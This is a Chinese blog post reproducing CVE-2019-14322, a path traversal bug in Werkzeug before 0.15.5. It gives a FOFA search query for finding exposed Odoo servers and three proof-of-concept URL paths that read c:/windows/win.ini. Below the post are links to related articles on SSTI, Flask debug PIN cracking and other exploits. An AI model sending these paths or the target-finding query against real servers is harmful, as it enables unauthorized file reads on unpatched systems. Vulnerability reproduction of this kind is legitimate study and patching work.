(CVE-2019-14322)Pallets Werkzeug 0.15.4 路径遍历漏洞

最新推荐文章于 2024-06-07 22:44:37 发布
最新推荐文章于 2024-06-07 22:44:37 发布
阅读量2.3k 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/119350981
版权

漏洞描述

      在0.15.5之前的Pallets Werkzeug中,shareddatmiddleware错误处理了Windows路径名中的驱动器名。

漏洞影响

小于 Werkzeug 0.15.5

FOFA

title=“Odoo”

漏洞复现

Poc:

/base/static/c:/windows/win.ini
/base_import/static/c:/windows/win.ini
/web/static/c:/windows/win.ini

image-20210710191959479

image-20210710192048883

凝聚力安全团队
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SSTI漏洞基础解析
weixin_43895765的博客
04-01 5526
🚩flask基础 flask是python编写的一个WEB应用程序框架,flask由Armin Ronacher带领的一个Pocco团队开发,flask基于werkzeug WSGI工具包个jinjia2模板引擎~ WSGI:Web Server Gateway Interface 即WEB服务器网关接口 🚩第一个flask程序 # 从flask中导入Flask,注意,flask是包名,Flask是模块名 from flask import Flask # 初始化Flask app = Flask(
werkzeug第一个坑
不务正业的猿
04-20 3480
最近在买了一本关于TensorFlow 2.0的实战编程书(走向TensorFlow 2.0深度学习应用编程快速入门),里面是附带源码,书里说的代码都是验证过的,对于一个初学者来说,从零开始搭建项目,确实是会遇到不同的坑。由于自己很久没有写过python代码,而且电脑也是新的,python相关环境都没有。首先需要装好Anaconda,再安装TensorFlow相关库,再搞个开发工具pycharm,...
SSTI模板注入漏洞基础
最新发布
2301_80913334的博客
06-07 595
良好的文档、丰富的插件、包含开发服务器和调试器、集成支持单元测试、RESTful请求调度、支持安全cookies、基于Unicode。
werkzeug中服务器处理请求的实现
weixin_34007291的博客
01-15 209
当成功建立好服务器后,接下来就是等待请求并处理请求通过路由分配给相应的视图函数了,以下是函数调用过程 -> self._handle_request_noblock() /usr/lib/python2.7/SocketServer.py(295)_handle_request_noblock()-> self.process_request(request, client_add...
Werkzeug 一个简单例子
keny-大成的博客
03-11 518
Werkzeug 一个简单例子 1.Werkzeug 是一个全面的WSGI web应用程序库。它最初是WSGI应用程序的各种实用程序的简单集合,现在已经成为最先进的WSGI实用程序库之一。 Flask包装了Werkzeug,使用它来处理WSGI的细节,同时为定义强大的应用程序提供了更多的结构和模式。 2.一个wekzeug代码 from werkzeug.wrappers import...
Linux有问必答:Linux上Apache错误日志的位置在哪里?
weixin_34123613的博客
05-02 434
错误日志和访问日志文件为系统管理员提供了有用的信息,比如,为 Web 服务器排障,保护系统不受各种各样的恶意活动侵犯,或者只是进行各种各样的分析以监控 HTTP 服务器。根据你 Web 服务器配置的不同,其错误/访问日志可能放在你系统中不同位置。 本文可以帮助你找到Linux上的Apache错误日志。 Debian,Ubuntu或Linux Mint...
【vulhub靶场】medium_socnet
今天是几号的博客
03-24 920
显示缺少libstdc++库,尝试能不能 apt-get install libstdc++6 一下,答案是没有权限,那么能不能从kali上把该库文件复制过来使用呢?复制过来需要放到/usr/lib/目录下,不然程序无法正常调用,然而该目录是禁止普通用户访问的。Dockerfile 是一个文本文件,其内包含了一条条的指令(Instruction),每一条指令构建一层,因此每一条指令的内容,就是描述该层应当如何构建。服务端连接成功,获取到了一个会话,进入这个会话中,开启一个 socks 代理。
Weblogic-CVE-2019-2725补丁升级方法.docx
11-08
2019年,WebLogic Server被发现存在一个名为CVE-2019-2725的重大安全漏洞,该漏洞允许远程攻击者执行任意代码,对系统造成严重威胁。本文将详细介绍如何针对这个漏洞进行补丁升级。 CVE-2019-2725是一个高危的...
cve-2019-11477--2019-06-17-1629.sh
06-27
Linux 内核TCP “SACK Panic” 远程拒绝服务漏洞-cve-2019-11477 检测脚本。
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
cve-2019-0708-poc-exp.zip
05-20
标题 "cve-2019-0708-poc-exp.zip" 指涉的是一个与CVE-2019-0708漏洞相关的Proof-of-Concept(PoC)利用工具的压缩包。这个漏洞,通常被称为“BlueKeep”,是一个严重且广泛影响微软远程桌面服务的安全漏洞。描述中...
内网靶机实战
qq_41672971的博客
01-29 675
1111111111111111111111
[原创]夺棋赛HackTheBox OpenSource攻略
huandaohack的专栏
06-26 2480
夺棋赛HackTheBox OpenSource攻略
Odoo已知Bug
iuv_li的博客
11-13 1087
Odoo已知Bug 1、模块类别name的多语言问题: base/module/module.py def _update_category(self, cr, uid, mod_browse, category='Uncategorized'): current_category = mod_browse.category_id current_category_path = [] while current_category: current_category_p
odoo15 crm中的一个界面罗辑功能错误
fqfq123456的专栏
04-08 342
odoo15 crm 中的一个罗辑界面错误 此处打开的不是活动计划,而是商机 点新建可发现: 或在商机中新建一个计划,在这里也不显示 在我的活动中: 没变,准备改造之 从下面代码可以发现 <!-- My Activities Menu --> <record id="crm_lead_action_my_activities" model="ir.actions.act_window"> <field name="name">.
【Python-flask库开启debug调试导致PIN码破解泄露getshell】
giaogiaohuohua的博客
01-25 1566
2、这里又有一个坑点,配置好了python之后呢,既然是破解PIN码,肯定是需要安装flask,然后看看对应版本中PIN的算法,这里直接使用pip安装会报错,pip会说版本太低了,要先升级,升级完成之后就会报错如下。注:flask在遇到报错时,如果开启了debug模式,就可以在web上建立一个交互式shell进行python调试,但是需要PIN码,PIN码是可以破解的。4、得到全部参数后,运行脚本,将得到的PIN码输入到,即可开启debug调试模式。注:不同的python版本,1、python的版本。
python常用库之WSGI工具包werkzeug
西京刀客
03-13 644
Werkzeug是Python的WSGI规范的实用函数库。使用广泛,基于BSD协议.。
什么是重定向,如何实现?真实的漏洞报告是什么样的?(open redirect vulnerabilities)
嗯哼~~~
08-30 144
可能还要插句嘴,上面的两图,是代码内部的大概样子,具体的URL可能不会直接贴在代码里,而是通过参数传递,比如下面真实的报告例子,是通过参数redirect传递的。如果有一天这个地址(指向该内容的url)变了,但我这里引用的还是老地址,当有人点击的时候,可能找不到(not found),也可能直接跳转到对应的新的地址(所谓的重定向)。(% 编码为%25,解码时,从左到右,前头的%25 解码成%,第二次解码时,前面还有一个%25,还是解码成%,第三次解码时,剩下%3A 解码成 : )##例子(Example)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值